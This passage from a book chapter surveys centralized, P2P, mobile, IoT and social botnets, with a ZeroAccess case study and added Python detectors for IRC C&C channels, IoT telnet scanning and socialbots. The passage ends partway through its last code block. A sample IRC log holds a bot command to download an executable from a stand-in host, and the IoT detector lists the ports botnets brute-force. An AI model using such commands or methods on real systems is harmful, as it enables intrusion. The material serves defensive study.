For better management, botmasters usually adopt a hierarchical structure rather than the basic centralized structure. In a hierarchical topology, the botmaster controls a set of machines called bot controllers. Each bot controller manages a set of bots. Using multiple bot controllers makes the C&C channel more resilient.

Centralized botnets (both basic and hierarchical) are easier to create and manage. Moreover, they respond to commands faster than the P2P structure. However, botmasters lose control over the C&C channel once it is shut down by detection and isolation methods. In addition, if the C&C server is hijacked, the botnet structure and behavior are discovered. Hence, active monitoring techniques are employed to discover malicious traffic and activities on public IRC servers [1,21,32].

1.4 P2P Botnets

The design of centralized botnets has the major drawback of a single point of failure. Therefore, some attackers have used P2P technology for C&C, where each bot communicates with a subset of other bots in the network [33–35]. The improvement of P2P technology and the widespread use of P2P file sharing have attracted botmasters to adopt this technology in constructing a new generation of botnets that inherits its robustness, scalability, and resilience. Table 1.1 lists some of the most popular P2P botnets that appeared in the wild and remained active for a long period of time.
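Before turning to P2P designs, the active monitoring of public IRC servers mentioned at the end of Section 1.3.1 can be illustrated with a small detector. The Python code below is an added example, not code from the book or from any IRC server or bot project. It assumes server-relayed IRC messages in the standard ":prefix COMMAND params" form and runs over a constructed log excerpt. It looks for the two traits of the case study above: a channel whose topic begins with a one-character command prefix (the sdbot prefix setting) and that a large number of clients join.

```python
import re
from collections import defaultdict

# Constructed IRC server-side log excerpt (not real traffic); each line is one
# raw IRC message as a server would relay it. #linuxhelp is a normal channel,
# #nes554 (the channel name from the sdbot configuration) behaves like C&C.
SAMPLE_IRC_LOG = """\
:alice!alice@198.51.100.7 JOIN #linuxhelp
:bob!bob@198.51.100.8 JOIN #linuxhelp
:alice!alice@198.51.100.7 TOPIC #linuxhelp :Welcome, ask your kernel questions here
:h0st1234!h0st@203.0.113.10 JOIN #nes554
:h0st5678!h0st@203.0.113.11 JOIN #nes554
:h0st9012!h0st@203.0.113.12 JOIN #nes554
:h0st3456!h0st@203.0.113.13 JOIN #nes554
:h0st7890!h0st@203.0.113.14 JOIN #nes554
:op!op@192.0.2.5 TOPIC #nes554 :.update http://example.invalid/b.exe
"""

JOIN_RE = re.compile(r"^:(?P<nick>[^!\s]+)!\S+ JOIN :?(?P<chan>#\S+)")
TOPIC_RE = re.compile(r"^:(?P<nick>[^!\s]+)!\S+ TOPIC (?P<chan>#\S+) :(?P<topic>.*)$")
# Numeric 332 (RPL_TOPIC) form sent on join: ":server 332 nick #chan :topic"
RPL_TOPIC_RE = re.compile(r"^:\S+ 332 \S+ (?P<chan>#\S+) :(?P<topic>.*)$")

# One-character command prefixes; '.' is the sdbot default shown above,
# the others are assumed alternatives a monitor would also watch for.
COMMAND_PREFIXES = ".!$"


def parse_irc_log(text):
    """Return (joins, topics): joins maps channel -> set of joining nicks,
    topics maps channel -> the last topic seen for it."""
    joins = defaultdict(set)
    topics = {}
    for line in text.splitlines():
        m = JOIN_RE.match(line)
        if m:
            joins[m.group("chan")].add(m.group("nick"))
            continue
        m = TOPIC_RE.match(line) or RPL_TOPIC_RE.match(line)
        if m:
            topics[m.group("chan")] = m.group("topic")
    return joins, topics


def topic_looks_like_command(topic):
    """A topic that starts with a command prefix followed by a bare word is
    how topic-driven bots receive orders; human topics start with text."""
    return bool(topic) and topic[0] in COMMAND_PREFIXES and topic[1:2].isalpha()


def suspicious_channels(text, min_members=5):
    """Flag channels whose topic looks like a bot command and that at least
    min_members distinct clients joined. Returns channel -> (members, topic)."""
    joins, topics = parse_irc_log(text)
    flagged = {}
    for chan, topic in topics.items():
        members = len(joins.get(chan, ()))
        if topic_looks_like_command(topic) and members >= min_members:
            flagged[chan] = (members, topic)
    return flagged


if __name__ == "__main__":
    for chan, (members, topic) in suspicious_channels(SAMPLE_IRC_LOG).items():
        print(f"{chan}: {members} members, command-like topic {topic!r}")
```

A single indicator is weak on its own: chat channels occasionally set punctuation-led topics, and a bot channel may be keyed (JOIN with a channel password) so that the monitor never sees the topic. In practice the join-burst count and the command-like topic are combined with the other traits of the case study, such as many clients with machine-generated nicknames joining from unrelated networks within seconds of each other.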
P2P botnets are more complex than traditional centralized botnets. In this architecture, bots reside on compromised machines within the botnet network and communicate with each other rather than through a C&C server. Hence, the bots in the network send commands to each other. Each bot keeps a list of its neighbors. When it receives a command from one of its neighbors, the bot forwards that command to the other neighbors in its list. This scenario results in a network that is called a zombie network. Once a botmaster gains access to one host in the zombie network, the botmaster obtains full control of the botnet. Each host in the P2P network acts as both a client and a server, since there is no centralized point in this architecture.

P2P communication provides attackers with greater capabilities than the centralized C&C architecture. In P2P botnets, if defenders are able to discover a subset of the bots and isolate them, the communication among the rest of the bots is not disrupted. From a botmaster's perspective, it is more difficult to create and manage P2P botnets. Moreover, it takes more time to propagate C&C messages to all botnet members. Hence, botmasters prefer simple designs when developing P2P C&C channels. For example, Phatbot stores the list of bots in Gnutella cache servers. This makes it possible to discover the botnet by probing the cache servers. On the other hand, Sinit uses random probing in order to find the bot members. In P2P botnets, if the IP address of a bot changes (dynamic IP addresses), then the bot leaves the botnet network [32]. Typically, a P2P C&C channel is implemented using existing P2P file sharing applications, such as Gnutella, Kazaa, and eMule, or it can be implemented using proprietary protocols. The basic structure of a P2P botnet is shown in Figure 1.6.

Table 1.1 Popular P2P botnets

Botnet | Year | C&C | Main activity
Nugache | January 2006 | Based on custom protocol | Theft of financial credentials via keystroke logging
Storm [37] | January 2007 | Based on Overnet, a Kademlia implementation | Email spam and DDoS attacks via keystroke logging
Sality [38] | January 2008 | Unstructured P2P network | Stealthy scanning targeting critical voice communications infrastructure
Waledac [39] | December 2008 | HTTP communication and a fast-flux based DNS network | Email spam
ZeroAccess v1 | July 2009 | Unstructured P2P architecture | Bitcoin mining and click fraud
ZeroAccess v2 | February 2012 | Unstructured P2P architecture | Bitcoin mining and click fraud
Kelihos v1 [40] | December 2010 | Unstructured P2P botnet | Email spam and ID theft
Miner [41] | August 2011 | Unstructured P2P botnet | Bitcoin mining
Zeus [42] | September 2011 | Unstructured P2P botnet | Steal credentials (particularly for financial institutions) from infected systems
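The resilience claim made above (isolating a subset of the bots does not disrupt communication among the rest) can be checked directly on the graph view of a botnet. The following Python code is an added example, not code from the book or from any botnet analysis tool. It builds an adjacency map from per-bot peer-lists, then measures how much of the network a takedown leaves connected, comparing the centralized star of Section 1.3 with a constructed random-peer-list P2P topology; the topologies, bot names and the 20% takedown sizes are assumptions chosen for illustration.

```python
import random
from collections import deque


def build_graph(peer_lists):
    """Build an undirected adjacency map from per-bot peer-lists.
    A link exists if either bot lists the other; bots that appear only
    inside someone else's list (e.g. the C&C server) become vertices too."""
    adj = {bot: set() for bot in peer_lists}
    for bot, peers in peer_lists.items():
        for peer in peers:
            adj.setdefault(peer, set())
            adj[bot].add(peer)
            adj[peer].add(bot)
    return adj


def largest_component(adj, removed=frozenset()):
    """Size of the largest connected component once the `removed` bots are
    isolated (BFS; isolated bots are treated as if they no longer exist)."""
    seen = set(removed)
    best = 0
    for start in adj:
        if start in seen:
            continue
        queue, size = deque([start]), 1
        seen.add(start)
        while queue:
            node = queue.popleft()
            for nb in adj[node]:
                if nb not in seen:
                    seen.add(nb)
                    size += 1
                    queue.append(nb)
        best = max(best, size)
    return best


def surviving_fraction(peer_lists, removed):
    """Fraction of the non-isolated bots that can still reach each other;
    1.0 means the takedown left the remaining bots fully connected."""
    adj = build_graph(peer_lists)
    remaining = len(adj) - len(set(removed) & set(adj))
    return largest_component(adj, removed) / remaining if remaining else 0.0


def highest_degree_bots(peer_lists, k):
    """The k best-connected bots: the natural targets for a defender who can
    only isolate a few nodes (ties broken by name for determinism)."""
    adj = build_graph(peer_lists)
    return set(sorted(adj, key=lambda b: (-len(adj[b]), b))[:k])


# Constructed topologies (not real botnet data).
def star_topology(n_bots):
    # Centralized design: every bot's only peer is the C&C server.
    return {f"bot{i}": ["cc"] for i in range(n_bots)}


def p2p_topology(n_bots, peers_per_bot, seed=7):
    # Each bot starts with a random peer-list of other bots, as a Zeus-style
    # bot would after bootstrapping; the seed keeps the example deterministic.
    rng = random.Random(seed)
    ids = [f"bot{i}" for i in range(n_bots)]
    return {b: rng.sample([x for x in ids if x != b], peers_per_bot) for b in ids}


if __name__ == "__main__":
    star = star_topology(50)
    print("star, C&C server isolated:", surviving_fraction(star, {"cc"}))
    p2p = p2p_topology(200, 8)
    random_hit = {f"bot{i}" for i in range(40)}   # 20% of bots found by chance
    targeted = highest_degree_bots(p2p, 40)       # 20% best-connected bots
    print("p2p, 20% random bots isolated:", surviving_fraction(p2p, random_hit))
    print("p2p, 20% highest-degree bots isolated:", surviving_fraction(p2p, targeted))
```

Isolating the single C&C server leaves every bot of the star cut off, whereas isolating a fifth of the P2P bots, even the best-connected fifth, leaves the remainder in one component. This is why P2P takedowns concentrate on the bootstrapping server that most P2P botnets still depend on, or on poisoning the peer-lists themselves, rather than on removing individual bots.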
P2P botnets can be represented as a graph in which the bots are the vertices and the links between bots are the edges. For example, in Zeus, each bot in the graph has a peer-list [36]. Each bot knows a subset of bots and maintains connections to them. A peer-list request is issued by a bot when it starts to lose connections from its original list. A bot that receives a peer-list request shares its peer-list with the requesting bot, allowing that bot to expand its own peer-list. However, in most P2P botnets the architecture is not entirely P2P, as it includes a central server for bootstrapping and obtaining initial peer-lists, such as in Zeus [36]. In the following subsection, we present the ZeroAccess botnet as a case study of P2P botnets.

1.4.1 Case Study: ZeroAccess P2P Botnet

ZeroAccess (ZA) is a popular and complex P2P botnet. Two versions of the ZA malware appeared in September 2011 (ZAv1) and April 2012 (ZAv2). The two versions had infected millions of machines at that time [43]. The ZA botnet malware is considered a remarkable botnet because of many features in its design and operation. These include its ability to infect both 32-bit and 64-bit Windows machines, its ability to hide itself and persist on the infected system, the P2P C&C channel structure in which nodes are labeled as "supernodes" or "regular nodes," and the use of encryption and obfuscation to hide its communication patterns. The ZA rootkit evolved over time, with new functionalities and features introduced subsequently. In the following, we discuss the main steps of the ZA life cycle, focusing on the techniques that were used for infection, installation, and C&C of the ZA malware.

Figure 1.6 Basic architecture of P2P botnets.

1. Malware distribution: Two standard mechanisms were used to distribute the ZA malware trojan. The first mechanism is exploit packs, which come as a collection of JavaScripts that take advantage of known vulnerabilities in applications such as Flash players, web browsers, and PDF readers. The infection occurs by compromising several legitimate websites using attack methods such as SQL injection and stolen FTP credentials. Attackers then insert malicious JavaScript code into pages of these websites in order to redirect the websites' visitors to the mothership servers that host the original exploit pack. Attackers trick users into visiting these websites using different techniques such as email spam campaigns. Email spam campaigns contain links to these websites with attractive content that increases the chances of the links being clicked. Attackers also use search engine manipulation methods to make the compromised websites appear at the top of the search engine results page. The second mechanism used to spread the ZA malware trojan is social engineering. This technique aims to attract users to download and run a malicious executable. For example, end users are usually attracted to download popular games, a pirated version of a game, or any other attractive piece of software that is made available on websites under the control of the attacker.

2. Malware installation: ZA used the ZwQueryInformationProcess API to determine whether the operating system is 32-bit or 64-bit, and based on that it decides the appropriate installation mechanism. One of the installation requirements of the ZA trojan is to obtain escalated privileges. To gain this, the malware has to overcome the User Account Control (UAC) mechanism that is deployed in the Windows operating system to prevent illegal access. This is achieved by including a legitimate payload (e.g., Adobe Flash Player) in addition to the malicious one as part of the software that is to be installed. This method tricks the user into providing the required access privilege by accepting warning messages in order to install the legitimate software. For example, the system may display a warning message asking the user to accept the installation of some legitimate software. By clicking OK, the user indirectly gives the ZA trojan the privilege it needs to be installed.

3. Staying on the system: The ZA rootkit adopted several techniques to stay on the infected system and remain hidden without being detected. These include a kernel manipulation technique: the ZA rootkit creates a malicious copy of a kernel-mode driver and overwrites the original driver by loading its own code into kernel space. This makes it difficult to distinguish ZA from the legitimate driver. Another technique is to store malicious files in a hidden volume in the file system. The volume is created specifically for this purpose in order to avoid detection. Later versions of ZA adopted the technique of storing their encrypted malicious files in a legitimate-looking Windows directory and restricting access to that directory. The differences between the 32-bit and 64-bit versions were eliminated gradually in subsequent versions of the ZA malware by moving away from reliance on kernel components. In the most recent versions of ZA, the malware injects itself into common Windows services such as explorer.exe and services.exe. In addition, ZA disables security services in Windows such as the Windows firewall, the Windows Security Center, and Windows Defender.

4. Command and control: After installation, the ZA malware connects back to a central server with an IP address that is hard-coded in the bot's binary. Through this connection, the bot provides the server with information about the infected machine and its configuration. It also authenticates itself to the server by providing the server with a randomly generated domain name. This domain name corresponds to a non-existent server and changes from day to day, as the domain generation algorithm uses the current date as a seed value for domain generation. It serves the purpose of authenticating the bot: the server checks that the provided domain name belongs to the set of generated domains. The generated domains are included in advance in the bot binary. If the provided domain name is invalid, the server aborts the connection. Therefore, the server can make sure that only ZA bots connect to it, which prevents botnet infiltration attempts. Each ZA malware instance is shipped with an initial list of 256 IP addresses that represent infected machines. These IPs are ordered based on their last seen time. This initial contact list is used by the bot to join the ZA P2P network by initiating connections to certain port numbers.
Bots that have public IP addresses are labeled as supernodes, while bots that reside behind a NAT box are labeled as regular nodes. For a node to be part of the P2P network, it should be reachable from the outside.

5. Attack activity: Throughout its lifetime, ZA has been the source of different malicious activities including spam, click fraud, and bitcoin mining. Bitcoin mining represents a new type of botnet activity that is associated with the development of digital currency. The idea is to leverage the collective computational power of bot machines to generate bitcoins for the botmaster's benefit.

1.5 Mobile Botnets

Modern mobile devices have attracted the attention of attackers because they provide enough resources to launch large-scale attacks. Currently, mobile devices are powerful platforms equipped with high computation power, large storage, Internet connectivity, and a wide range of applications. In addition, technology is improving the battery lifetime of mobile devices, which allows them to withstand high computation and network demands.

Smartphones have become very popular in recent years. At the same time, a new generation of malware that targets these devices has evolved and is becoming a major threat to this technology. In most cases, this malware aims at constructing smartphone botnets. A smartphone botnet is a group of compromised smartphones that are remotely controlled by botmasters via C&C channels [44]. These botnets provide attackers with capabilities to perform many nefarious activities that greatly violate users' privacy. This includes, but is not limited to, installing new applications, requesting a URL from the phone, sending spam, achieving financial gains by sending premium SMSs, making phone calls, spying on users, and displaying ads and notifications. The main factors that make smartphones (e.g., iPhone and Android-based phones) an attractive target for attackers include:

■ High adoption rate of smartphones. With the emergence of mobile Internet access and the proliferation of mobile applications, smartphones have witnessed significant technological advancements. Smartphone prices have dropped significantly while sales have increased sharply in recent years [45]. It is expected that sales will increase in the coming years, especially in emerging markets. This provides a prolific environment for hackers to construct mobile botnets.

■ Computational power of smartphones. Today's smartphones have computational power and communication capabilities (in terms of memory, CPU, and transmission rate) that outperform some generations of PCs. This makes them a very attractive target for performing different types of nefarious activities such as sending spam and performing DDoS attacks.

■ Sensitive information available on smartphones. The private information that users save on their smartphones makes them a valuable target for attackers. A smartphone can be viewed as a personal wallet that contains highly sensitive information, including banking accounts, credit card numbers, personal pictures, phone calls, private messages, GPS location, and access to the phone camera.

■ Smartphones can be easily infected by malware. Smartphone users tend to accept downloads from untrusted sources. Attackers usually inject malicious code into mobile applications before uploading them to the Android market.

■ Lack of security protection for smartphones. The security market for smartphones is still immature, with a limited number of antimalware or antivirus products designed to address vulnerabilities in smartphones and to detect malware. This means that malware targeting smartphones can go undetected in most cases.

■ Internet connectivity. Smartphones are usually connected to the Internet most of the time, either through WiFi networks or data services. Users tend to keep their smartphones turned on with WiFi or data connections enabled in order to stay connected and have access to their favorite social networking applications.

■ C&C implementation. Mobile botnets in general, and smartphone botnets in particular, offer new approaches for C&C implementation that were unavailable to PC-based botnets. Instead of relying on traditional application-layer protocols (e.g., HTTP, IRC, and file sharing applications) for C&C implementation, other techniques that are specific to mobile phone technology can be used. These include short messaging services (SMS), push notification services that are available in mobile applications, short URL services, and Bluetooth.

It is important to mention that there are some limitations regarding mobile botnet construction. These limitations include: (i) Smartphones are battery limited, which requires botmasters to account for bot devices that are running out of power. This has an impact on the operation of the mobile botnet, especially when mobile botnets are involved in activities that require high processing and communication capabilities. If the battery power of a device drops faster than normal, the user may suspect that there is something wrong with his/her phone. (ii) Mobile botnets usually cause increased consumption of data or SMS messages, leading to additional billing cost. (iii) Smartphones are assigned private IP addresses rather than public IP addresses, which restricts the creation of a C&C channel when compared to PC-based botnets.

The life cycle of mobile botnets is very similar to that of traditional PC-based botnets in terms of the main stages described in Section 1.2. Also, the mobile botnet architecture can be centralized or distributed (P2P), in a way similar to traditional botnets. However, there are major differences in C&C channel implementation, infection vectors, and approaches. This is due to the additional features that are available in smartphones, such as Bluetooth, SMS, GPS sensors, and notification services.

Some mobile botnets that appeared in the early period of mobile botnets used a conventional HTTP-based C&C channel for communication. Examples are the SymbOS.Yxes botnet, which appeared in 2009 to target the Symbian platform [46], the Ikee.B mobile botnet, which targeted jailbroken iPhones in 2010 [47], and the GEINIMI mobile botnet, which is considered to be the first Android botnet [48]. Subsequently, other techniques that are specific to mobile phones were exploited to implement the C&C channel. ZeuS, for example, is an SMS-based botnet that targets the BlackBerry, Windows, and Symbian mobile platforms [49]. In addition, public blogs were used to implement the C&C channel of an Android botnet called AnserverBot in 2011 [50]. Advanced C&C architectures for mobile botnets were proposed in [51]. These architectures leverage Tor's hidden services and the DNS protocol to obfuscate the attackers' identity and increase the botnet's resiliency.
1.5.1 Examples of Mobile Botnets

In this subsection, we describe SMS-based mobile botnets and cloud-based push-styled mobile botnets. These two types of botnets represent typical examples of mobile botnets that employ mobile-specific C&C mechanisms.

1.5.1.1 SMS-based Mobile Botnets

The design and implementation of an SMS-based smartphone botnet were presented in [52]. In this type of botnet, commands are delivered to infected smartphones (bots) via SMS without being noticed by phone users. Each command is encoded in a fixed-size text message. Bots read these messages, decode them, and execute the commands according to a database that is made known to the bot during the installation phase. Using SMS messages for C&C provides more resilience and is considered more suitable for smartphone botnets for several reasons: (1) It does not require Internet connectivity. Even if the phone goes offline or moves outside a coverage area, commands are buffered at the service center and delivered when the phone becomes reachable. (2) SMS is a very popular service and among the most used data applications in the world. (3) Usually, smartphones have private IP addresses because they connect through access points or cell towers. Therefore, using SMS for C&C provides a suitable mechanism to deliver commands to bot machines even if they are unreachable via their private IP addresses. (4) It is difficult for a user to distinguish between SMS messages that are related to botnet activity and spam SMS messages.

A unique passcode is hard-coded in the bot binary in order to identify each bot. While it is possible to include a unique passcode for each bot, the design in [52] suggested that each group of bots that is responsible for the same botnet activity (e.g., spam, ID theft, etc.) has the same passcode. The hard-coded passcode in a bot binary is included in the SMS messages that are sent and received by that bot. To achieve stealthy operation, a malicious Android application installed on each bot registers itself as a background process in order to be able to send out SMS messages, get notified when an SMS message is received, read received messages, decode them, and finally delete them to avoid being noticed by the phone owner.

1.5.1.2 Cloud-Based Push-Styled Mobile Botnets

Cloud-based push-styled mobile botnets were presented in [53]. Push notification is a service that is widely available on smartphone platforms. In this service, mobile applications receive notification messages from the application servers through push-based messaging servers that are hosted in the cloud. There are several advantages of the push notification service that make it an attractive feature in mobile phones. For example, with this service, there is no need for the application server to periodically check the mobile device to find out whether the phone is on or off. In addition, notifications are sent to mobile devices without the need for continuous probing of application servers. These features simplify mobile application development and greatly reduce the workload on application servers. This explains the popularity of this service on most smartphone platforms, and hence it can be utilized for the implementation of C&C in mobile botnets.

A prototype of cloud-based push-styled mobile botnets using the Google Cloud to Device Messaging (C2DM) service for Android was presented in [53]. The main idea is to disseminate botmaster commands to the bot population in a stealthy manner as part of the normal C2DM traffic. This means that there is no direct communication between a botmaster and the bot devices. Instead, communication between them is done through the C2DM service. Implementing the C&C for such botnets involves a bot registration stage and a command dissemination stage. Although C2DM was officially deprecated, similar mechanisms, such as Firebase Cloud Messaging (FCM) from Google, can be used to construct cloud-based push-styled mobile botnets.

1.6 IoT Botnets

IoT botnets, such as Mirai, QBot, BASHLITE, Hajime, and their variants, aim to compromise IoT devices that are weakly configured and connected to the Internet. Most recently, the Torii bot was discovered and is considered to be more sophisticated than previously known IoT botnets [54]. IoT devices such as printers, DVRs, network routers, IP cameras, and CCTVs are distributed worldwide with the goal of having them running all the time. The manufacturers of IoT devices have focused on device functionality and ease of installation to attract customers. In addition, many users leave the default username and password that were shipped with the device unchanged.
Mirai and other IoT botnets exploit this simplicity of devices and compromise hundreds of thousands of them, relying on a dictionary of default usernames and passwords from different vendors. A large number of devices (victims) are orchestrated to launch DDoS attacks against selected targets. A large number can also be used for spamming and advertisement fraud. The IoT botnet architecture consists of four main components, which are: the Bot, the C&C server, the Loader, and the Report server [55]. The role of each of these components is described below:

1. The Bot: this is the malware that infects a vulnerable IoT device. It has two roles. The first role is to brute-force search for new victims to be compromised. New victims are IoT devices that are misconfigured, have software holes, or have default usernames and passwords. Hence, it is important for system administrators to install the most recent software patches, change passwords, and monitor their devices for any abnormal behavior. The second role is to execute commands that are sent by the C&C server, such as a DDoS attack.

2. The C&C Server: this is controlled by the botmaster to send commands to the bots, such as launching a DDoS attack. The botmaster is a person (hacker) who manages the botnet and develops, modifies, and updates the bots' programs and database. A DDoS command includes the packet type (e.g., SYN flooding), the target address, and the duration of the traffic.

3. The Loader: when a new IoT device is discovered and compromised by a bot, the bot executes a command to find the newly compromised device's architecture and software. Then, the new device is directed to download the corresponding botnet binaries from the loader server. The loader server has many binaries for different device architectures, including ARM and Intel.

4. The Report Server: this contains information and the status of all the bots (infected devices) in the botnet. The information includes IP address, port number, device architecture, and login credentials.

The threat of IoT botnets arises from the large number of infected devices, which is in the order of hundreds of thousands. These devices can generate tremendous network traffic if they are used to launch DDoS attacks. For example, a DDoS attack on Krebs reached an unprecedented traffic volume of more than 600 Gbps in 2016 [56]. Researchers have shown that the Mirai botnet infected more than 65,000 IoT devices in nearly 20 hours, and the number increased to reach 300,000 devices [57]. This number is likely to increase as the use of IoT devices grows; more than one hundred billion devices are expected by 2030 [58], unless effective countermeasure solutions are developed and used.

The infection process is based on a brute-force search for devices with default usernames and passwords using remote connections (telnet) on standard open ports. TCP ports 23, 2323, 7547, 5555, 23231, 37777, 6789, 22, 2222, 32, and 19058 are the most popular ones [59]. Furthermore, most UDP ports are targeted by compromised IoT devices. Among the top targeted UDP ports are ports 37547, 137, 53413, 37547, 32124, and 28183 [60]. The IP addresses to scan are randomly generated. After a successful connection to an IoT device, the botnet closes the open ports to prevent other botnets from trying to connect to the device. Default usernames and passwords, in addition to simple passwords (such as 123456), are hard-coded into the IoT botnet scripts.

The IoT botnet resides in the memory of compromised IoT devices. A restart or power-off of the device removes the botnet. However, this is difficult for system or network administrators to do. For example, if the infected devices are routers, the network will be interrupted while the routers are powered off and on again. Also, this action can result in a service level agreement (SLA) violation for services that require high availability.
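The scanning behavior just described (randomly chosen target addresses, a short list of telnet-like ports) is visible in perimeter flow logs before any device is compromised, which makes it a practical detection point. The following Python code is an added example, not code from the book or from any Mirai analysis. It assumes a constructed, whitespace-separated flow log (timestamp, source, destination, destination port, protocol, TCP flags) and flags sources that reach many distinct hosts on the page's TCP port list within a short time window; the window and threshold values are assumptions to be tuned per network.

```python
from collections import defaultdict
from datetime import datetime

# TCP ports named on the page as the most popular IoT-botnet scanning targets.
IOT_SCAN_PORTS = {23, 2323, 7547, 5555, 23231, 37777, 6789, 22, 2222, 32, 19058}

# Constructed firewall/NetFlow-style log lines (not real traffic):
# timestamp source destination dport proto flags
SAMPLE_FLOWS = """\
2016-09-20T10:00:01 203.0.113.45 192.0.2.10 23 tcp SYN
2016-09-20T10:00:01 203.0.113.45 192.0.2.11 23 tcp SYN
2016-09-20T10:00:02 203.0.113.45 192.0.2.12 2323 tcp SYN
2016-09-20T10:00:02 203.0.113.45 192.0.2.13 23 tcp SYN
2016-09-20T10:00:03 203.0.113.45 192.0.2.14 7547 tcp SYN
2016-09-20T10:00:03 203.0.113.45 192.0.2.15 23 tcp SYN
2016-09-20T10:00:04 203.0.113.45 192.0.2.16 23 tcp SYN
2016-09-20T10:00:04 203.0.113.45 192.0.2.17 23 tcp SYN
2016-09-20T10:00:05 198.51.100.9 192.0.2.10 443 tcp SYN
2016-09-20T10:00:06 198.51.100.9 192.0.2.10 443 tcp SYN
2016-09-20T10:05:00 198.51.100.20 192.0.2.30 22 tcp SYN
"""


def parse_flow(line):
    """Split one log line into (timestamp, src, dst, dport, proto, flags)."""
    ts, src, dst, dport, proto, flags = line.split()
    return datetime.fromisoformat(ts), src, dst, int(dport), proto, flags


def telnet_scanners(log_text, min_targets=5, window_seconds=60):
    """Return {src: (distinct targets, sorted ports)} for sources that opened
    connections to at least min_targets distinct hosts on IoT scan ports
    inside any window of window_seconds (sliding window per source)."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, dport, proto, _flags = parse_flow(line)
        if proto == "tcp" and dport in IOT_SCAN_PORTS:
            events[src].append((ts, dst, dport))

    flagged = {}
    for src, evs in events.items():
        evs.sort()
        start, best, best_ports = 0, 0, set()
        for end in range(len(evs)):
            # Advance the window start until the window fits in window_seconds.
            while (evs[end][0] - evs[start][0]).total_seconds() > window_seconds:
                start += 1
            window = evs[start:end + 1]
            targets = {dst for _, dst, _ in window}
            if len(targets) > best:
                best, best_ports = len(targets), {p for _, _, p in window}
        if best >= min_targets:
            flagged[src] = (best, sorted(best_ports))
    return flagged


if __name__ == "__main__":
    for src, (n, ports) in telnet_scanners(SAMPLE_FLOWS).items():
        print(f"{src}: {n} distinct hosts on ports {ports} within 60 s")
```

A single legitimate SSH login on port 22 stays below the threshold because the count is over distinct destination hosts, not connections; an infected device sweeping random addresses exceeds it within seconds. An alert on an internal source is the more valuable case, since it identifies a device that is already compromised and should be isolated, rebooted to clear the memory-resident bot, and given a non-default password before it is returned to the network.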
  • 41. The release of the source code of the Mirai botnet made it possible for researchers to understand the behavior of IoT botnets. This behavior is common in IoT botnets that were discovered, although some of them are more advanced than the original Mirai. Defining policies and rules that can detect and capture compromised devices can fight against the spread of IoT botnets. Access, communication, and usage polices are among these desired definitions [61]. Moreover, smarter and more intelligent methods can be developed using machine learning algorithms in order to efficiently detect compromised IoT devices and alert system administrators to isolate them from the network or block them automatically. For example, N-BaIoT is a method that uses deep learning for anomaly detection of network traffic [62]. On another hand, a method called AutoBotCatcher relies on the idea of mutual entities in the botnet community. For example, bots communicate with a C&C server. This makes the C&C server a mutual entity [58]. Based on identifying the botnet communities, AutoBotCatcher can be utilized by ISPs and network administrator to further investigate suspicious devices. In addition, methods such as encryption of IoT devices memory and data, easy and automated techniques to modify devices passwords, using different passwords than the ones that were shipped from factories, restricting access of ports on devices, and updating the devices’ firmware with the latest patches are among effective practices that prevent the widespread of IoT botnets [63]. 1.7 Social Botnets Socialbots are autonomous software programs that target online social networks (OSNs) such as Facebook and Twitter. These programs mimic the behavior of real users (humans) through posting comments (or tweets), re-posting messages that others have posted, sending connection requests, accepting requests from others, following others, etc. Socialbots aim to achieve mainly three objectives. 
The first one is to launch campaigns in order to promote some opinions or ideas in a community of users and making some topics popular. The second is to collect data especially private user information. These information becomes available once a user accepts a connection request from the socialbot. The third reason is to alter the graph structure of OSNs, which results in having fake or misleading patterns in the social network graph (vertices and edges). Boshmaf et al. showed that today’s OSNs are vulnerable to socialbots and conducted experiments on Facebook OSN [64]. In addition, Freitas et al. conducted socialbot experiments on Twitter OSN and showed that socialbots can infiltrate Twitter [65]. 1.7.1 Operation The following are typical steps that are carried out by socialbot developers for infiltration of OSNs. 24 ■ Botnet
1. Automatic creation of email accounts, as most OSNs require an email for verification. Hence, an adversary relies on email providers who allow an unlimited number of email accounts. Some adversaries might choose to create the email accounts manually.
2. Handling CAPTCHAs, as most OSNs rely on that technique to validate users. Different methods are used by socialbots to break CAPTCHAs in order to automate the process of infiltrating OSNs, especially to launch a large-scale attack. For example, socialbot developers use script identification, optical character recognition methods, utilize botnets that ask users to recognize CAPTCHAs, or rely on cheap-labor businesses (CAPTCHA-breaking businesses) to break CAPTCHAs [64,66,67].
3. Creating a profile for the accounts, which includes a job title and a picture. This is very important in order to increase attractiveness. For example, a person who has a professional career attracts users. In addition, a good-looking picture has the greatest impact, as described in [64]. Female profiles have a higher successful infiltration rate than male profiles. However, both get a similar acceptance rate if they have a high number of friends (contacts).

Developers of socialbots follow random behaviors in performing activities (i.e., posts, requests, follow-backs, etc.) in order to avoid being detected, as in the Realboy project by Zack Coburn and Greg Marra [68]. Some methods use social network honeypots in order to trap adversaries. These methods generate artificial profiles, monitor the profiles, and analyze their activities [69]. Designing and collecting datasets of OSNs can help in developing intelligent techniques that rely on anomalous behaviors for detecting socialbots [70]. Machine learning, classification, and artificial intelligence techniques have been developed in order to detect and isolate socialbots from OSNs [71–73]. However, more robust and sophisticated methods are still needed in order to detect non-trivial socialbot behaviors.
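As an added example (not code from the chapter or from any of the cited projects), the following Python script puts the two detection ideas of this section side by side: honeypot decoy profiles that never initiate contact, so any connection request they receive was attacker-initiated, and timing-regularity analysis of an account's activity. The decoy names, the activity log and the thresholds are constructed for illustration; the log includes a Realboy-style account with a jittered schedule to show that randomized timing defeats the cadence check but not the honeypot check.

```python
"""Socialbot triage from an OSN activity log: honeypot hits and timing regularity.

Constructed example. Events are (unix_time, actor, action, target). Decoys are
honeypot profiles that never initiate contact, so any inbound friend request
to a decoy was initiated by the other party.
"""
from collections import defaultdict
from dataclasses import dataclass, field
from statistics import mean, pstdev
from typing import Optional

# Constructed honeypot profiles (hypothetical names).
DECOYS = {"decoy_anna", "decoy_mark", "decoy_lee"}

# Constructed activity log.
# alice:       human-like, irregular timing, mixed actions, no decoys touched.
# bot_regular: scripted, one friend request every 600 s, no decoys touched.
# bot_random:  Realboy-style jittered schedule and mixed actions, but it sweeps
#              the network and sends requests to two decoys.
EVENTS = [
    (1000, "alice", "post", None),
    (4300, "alice", "friend_request", "bob"),
    (9100, "alice", "post", None),
    (31000, "alice", "friend_request", "carol"),
    (52000, "alice", "post", None),
    (60500, "alice", "accept_request", "dave"),
    (2000, "bot_regular", "friend_request", "u1"),
    (2600, "bot_regular", "friend_request", "u2"),
    (3200, "bot_regular", "friend_request", "u3"),
    (3800, "bot_regular", "friend_request", "u4"),
    (4400, "bot_regular", "friend_request", "u5"),
    (5000, "bot_regular", "friend_request", "u6"),
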